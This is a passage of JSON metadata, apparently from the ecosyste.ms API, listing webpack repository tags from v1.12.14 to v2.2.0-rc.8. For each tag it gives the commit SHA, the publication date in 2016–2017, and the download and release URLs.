osts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2